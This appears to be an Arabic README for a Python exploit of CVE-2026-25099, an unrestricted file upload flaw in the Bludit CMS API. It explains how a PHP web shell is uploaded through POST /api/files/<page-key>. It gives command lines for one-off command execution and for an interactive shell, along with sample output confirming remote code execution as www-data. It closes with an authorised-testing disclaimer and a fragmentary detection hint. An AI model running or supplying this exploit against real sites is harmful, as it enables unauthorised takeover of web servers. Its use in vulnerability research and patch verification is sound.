
استغلال بلغة بايثون لرفع ملفات غير مقيد في واجهة برمجة تطبيقات نظام إدارة المحتوى Bludit CMS مما يؤدي إلى تنفيذ كود عن بُعد، مع توفير تنفيذ الأوامر وقشرة تفاعلية للاختبار المصرح به.
إصدارات Bludit CMS قبل 3.18.4 تسمح لمهاجم مُصادق يمتلك رمز API صالحًا برفع ملفات من أي نوع وامتداد عبر نقطة النهاية POST /api/files/<page-key>. لا تقوم دالة uploadFile() بأي تحقق من امتداد الملف أو محتواه، مما يسمح برفع قشرة ويب PHP وتنفيذها بصلاحيات www-data.
# تنفيذ أمر واحد
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"
# قشرة تفاعلية
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"
[*] CVE-2026-25099 - Bludit CMS API رفع ملفات إلى RCE
[*] الهدف: http://target
[*] جاري استرجاع مفتاح الصفحة...
[+] مفتاح الصفحة: create-your-own-content
[*] جاري رفع القشرة...
[+] تم رفع القشرة: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] جاري التحقق من RCE...
[+] تم تأكيد RCE: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] قشرة تفاعلية (اكتب 'exit' للخروج)
shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

/bl-content/uploads/ بحثًا عن ملفات PHP غير متوقعةيحيى حمزة - https://yh.do
تُقدَّم هذه الأداة لأغراض اختبار الأمان المصرح به والأغراض التعليمية فقط. استخدمها بمسؤولية وفقط ضد الأنظمة التي لديك إذن باختبارها.